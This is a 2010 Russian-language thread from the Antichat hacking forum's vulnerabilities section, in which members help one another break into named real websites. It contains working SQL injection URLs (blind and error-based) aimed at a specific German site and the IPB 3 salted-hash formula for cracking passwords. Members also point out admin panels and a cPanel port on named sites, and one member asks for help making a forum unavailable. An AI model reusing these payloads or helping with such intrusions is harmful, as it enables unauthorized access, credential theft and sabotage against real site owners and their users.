HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13991  
Старый 22.06.2010, 21:11
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Двойной запрос.

Крути как слепую.
 
Ответить с цитированием

  #13992  
Старый 22.06.2010, 21:14
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5

а вот так не прокатило

http://www.editrans.de/?view=article&id=-6+or(1,1)=(select+count(0),concat((select+version( )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))from(information_schema.tables)group+by +2)--+
 
Ответить с цитированием

  #13993  
Старый 22.06.2010, 22:03
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
Code:
http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5
Вот так и крути.

Оффтоп: цитировать предыдущее сообщение не нужно
 
Ответить с цитированием

  #13994  
Старый 23.06.2010, 04:22
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме:
310791

Репутация: 6
Отправить сообщение для InfectedM с помощью ICQ
По умолчанию

Где IPB 3+ хранит соль?

И какой алгаритм шифровки искользуется?

Везде написано что в members_pass_salt ,но чет не видать( может быть что без соли ?

Columns: Table ibf_members

name

mgroup

email

joined

ip_address

posts

title

allow_admin_mails

time_offset

hide_email

email_pm

email_full

skin

warn_level

warn_lastwarn

language

last_post

restrict_post

view_sigs

view_img

view_avs

view_pop

bday_day

bday_month

bday_year

new_msg

msg_total

show_popup

misc

last_visit

last_activity

dst_in_use

view_prefs

coppa_user

mod_posts

auto_track

orig_name

lastnamechange

namehistory

org_perm_id

temp_ban

sub_end

login_anonymous

ignored_users

mgroup_others

member_login_key

member_login_key_expire

subs_pkg_chosen

has_blog

members_auto_dst

members_cache

members_disable_pm

members_display_name

members_created_remote

members_editor_choice

members_markers

members_profile_views

members_l_display_name

members_l_username

failed_logins

failed_login_count

has_gallery

gallery_perms

t23_pcr_time

ip_geo
 
Ответить с цитированием

  #13995  
Старый 23.06.2010, 09:33
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

http://www.elixirherbals.com
 
Ответить с цитированием

  #13996  
Старый 23.06.2010, 11:35
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от InfectedM  
InfectedM said:
Где IPB 3+ хранит соль?
И какой алгаритм шифровки искользуется?
Везде написано что в members_pass_salt ,но чет не видать( может быть что без соли ?
md5(md5($salt).md5($pass))
 
Ответить с цитированием

  #13997  
Старый 23.06.2010, 12:38
Dare
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979

Репутация: 53
Отправить сообщение для Dare с помощью ICQ
По умолчанию

http://www.lstc.edu

Буду безумно благодарен, если кто поможет найти админку
 
Ответить с цитированием

  #13998  
Старый 23.06.2010, 14:10
BlackFan
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442

Репутация: 41
По умолчанию

Вот это нашел только, хз то или нет)

2 Dare

http://www.lstc.edu/intranet/

2 Bramin

http://www.elixirherbals.com:2082/
 
Ответить с цитированием

  #13999  
Старый 23.06.2010, 14:11
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619

Репутация: 10
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//lstcnet.lstc.edu/ics[/COLOR][/COLOR] 
Вот это не подойдет?

А вообще ты глянь из какой ты базы данных хочешь пароли-явки взять.
 
Ответить с цитированием

  #14000  
Старый 23.06.2010, 15:11
se55555
Guest
Сообщений: n/a
Провел на форуме:
584

Репутация: 0
По умолчанию

Парни, всем привет. В общем не мое это дело, ломать форумы, я обычный программист, но стала такая ситуация очень нужной, а разобраться до самого последнего конца не могу.

Есть форум: _forum.help-animal. org.ua

Настоящая организация уже давно уехала с форума, делает себе новый сайт, а владелец этого форума еще пишет от ихнего имени.

Цель: Сделать сайт недоступным для общества.

Я так понял, форум вообще не защищен, так как устанавливали люди, которые в этом деле не совсем разбираются.

Я понимаю, что никто на блюдечке мне не принесет пароль администратора, по этому прошу хотя-бы подсказать путь, в каком направлении мне двигаться.

Буду раз за помощь.

В данной ситуации я смог только увидеть chenlog.html, установить Perl и начать запускать готовые pl скрипты, но дальше тупик. Понять суть заливания шелов тоже не могу, подмена печенек в этой версии форума, как я понял невозможна, за sql "прививки" вообще молчу . Так-что я продвинулся не так далеко, как бы хотел.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ